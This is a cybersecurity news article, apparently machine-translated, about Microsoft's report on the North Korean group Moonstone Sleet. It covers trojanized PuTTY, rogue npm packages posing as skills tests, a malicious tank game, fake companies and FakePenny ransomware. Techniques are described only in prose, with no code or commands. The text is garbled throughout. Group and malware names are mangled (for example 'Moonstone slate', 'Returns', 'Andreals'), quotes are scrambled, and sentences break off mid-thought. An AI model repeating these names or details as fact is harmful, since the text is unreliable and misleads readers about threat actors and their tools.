The North Korean threat actor has never been seen before. Moonstone slate Ransomware and bespoke malware previously associated with the infamous Lazarus group have been behind cyber attacks targeting individuals and organizations in the software and information technology, education and defense industrial base sectors.

The Microsoft Threat Intelligence Team said “Moonstone Slate was seen to set up fake companies and engage with potential targets, use trojanized versions of legitimate tools, create a malicious game, and deliver new custom ransomware.” Is.” said In a new analysis

It also characterized the threat actor as combining tried-and-true techniques used by other North Korean threat actors and using unique attack mechanisms to achieve its strategic objectives.

The adversary identified so far by Redmond under the emerging cluster moniker Storm-1789 is a state-linked group that originally demonstrated strong strategic overlap with him. The Lazar Group (aka Diamond Slate), before establishing its own distinct identity through separate infrastructure and tradecraft.

Similarities with Lazarus include extensive reuse of code such as known malware. Returnswhich was first observed in January 2021 in connection with a campaign targeting security researchers working on vulnerability research and development.

Comebacker was put to use by the Lazarus Group as recently as this February, embedding it internally. Seemingly innocuous Python and npm packages Connecting to the Command and Control (C2) server to retrieve additional payloads.

To support its diverse goals, Moonstone Sleet has also been known to hire software development positions at multiple legitimate companies, possibly Generate illegal income Gaining secret access to a sanctioned country or organization.

Attack chains observed in August 2023 involved the use of a modified version of PuTTY – a tactic The Lazar Group By the end of 2022 as part of Operation Dream Job – Through LinkedIn and Telegram as well as developer freelancing platforms.

“Often, the actor targeted a .ZIP archive containing two files: putty.exe and a trojanized version of url.txt, which contained an IP address and password,” Microsoft said. “If the supplied IP and password were entered by the user into a PuTTY application, the application would decrypt the embedded payload, then load and execute it.”

The trojanized PuTTY executable is designed to drop a custom installer dubbed the Split Loader that eventually launches a series of intermediate steps to launch a Trojan loader that executes the portable executable received from the C2 server. is responsible for giving.

An alternative attack sequence involves the use of malicious npm packages provided by LinkedIn or freelancing websites, often posing as a fake company to send ZIP files under the guise of a technical skills assessment.

These npm packages connect to an actor-controlled IP address and drop payloads like the splitloader, or the Windows Local Security Authority Subsystem Service (LSASS) the process.

It’s worth noting that targeting npm developers using fake packages is related to a campaign previously documented as Palo Alto Networks Unit 42. Contagious interview (Aka DEV#POPPER). It’s Microsoft Activity tracking Named Storm-1877.

Michael Sikorsky, vice president and CTO of Unit 42, told The Hacker News that they are still analyzing, but noted that there is no “direct overlap” between the Moonstone slate and the infectious interview.

Rogue npm packages have also been a malware delivery vector for another codenamed group linked to North Korea. Jade slate (aka TraderTraitor and UNC4899), who was involved in the Jump Cloud hack last year.

Other attacks discovered by Microsoft since February 2024 used a malicious tank game called DeTankWar (aka DeFiTankWar, ​​DeTankZone, and TankWarsZone) that was distributed to targets via email or messaging platforms. , while X provides a layer of legitimacy by setting up fake accounts on websites. (formerly Twitter).

“Moonstone Sleet typically reaches its targets through messaging platforms or email, presenting itself as a game developer seeking investment or developer support,” Microsoft researchers said. And either masquerading as a legitimate blockchain company or using fake companies.”

“Moonstone Sleet used a fake company called CC Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target an opportunity to contribute, including in the body of the message. with a link to download the included game.”

The intended game (“delfi-tank-unity.exe”) is equipped with a malware loader called YouieLoad, which loads next-stage payloads into memory and collects network and user discovery and browser data. Able to create malicious services.

Another non-existent company – complete with custom domains, fake employee personas, and social media accounts – created by Moonstone Sleet for its social engineering campaigns is StarGlow Ventures, which has reached potential targets for collaboration. masquerading as a legitimate software development company for On projects related to web apps, mobile apps, blockchain and AI.

Although the end of the campaign, which ran from January to April 2024, is unclear, the fact that the email messages were embedded with a tracking pixel raises the possibility that it was a trust-building exercise. Used as part of and specified. Which recipients engage with emails for future revenue generation opportunities?

The latest tool in the adversary’s arsenal is a custom ransomware variant called FakePenny that was deployed against an unnamed defense technology company in April 2024 in exchange for a ransom of $6.6 million in Bitcoin.

Using ransomware is another tactic straight out of the Andreals (aka Onyx Slate) playbook, a subgroup operating within the Lazarus umbrella known for its ransomware families. H0lyGh0st And Moi.

In addition to taking the necessary security measures to defend against threat actor attacks, Redmond is urging software companies to be on the lookout for supply chain attacks, the poisoning of software supply chains by North Korean hacking groups. Given the propensity to commit widespread malicious acts to.

“Moonstone Slate’s diverse set of tactics is notable not only for their effectiveness, but also because of the many years of activity North Korea has employed to meet North Korea’s cyber objectives,” the company said. How have they evolved from many other risk actors,” the company said.

The revelation came as South Korea accused its North counterpart, the Lazarus Group, of stealing 1,014 gigabytes of data and documents such as names, resident registration numbers and financial records from the court network between January 7, 2021 and February 9, 2023. Korea JoongAng Daily Reported earlier this month.

(The story was updated after publication on June 1, 2024, to include a comment from Palo Alto Networks Unit 42 about the infectious interview.)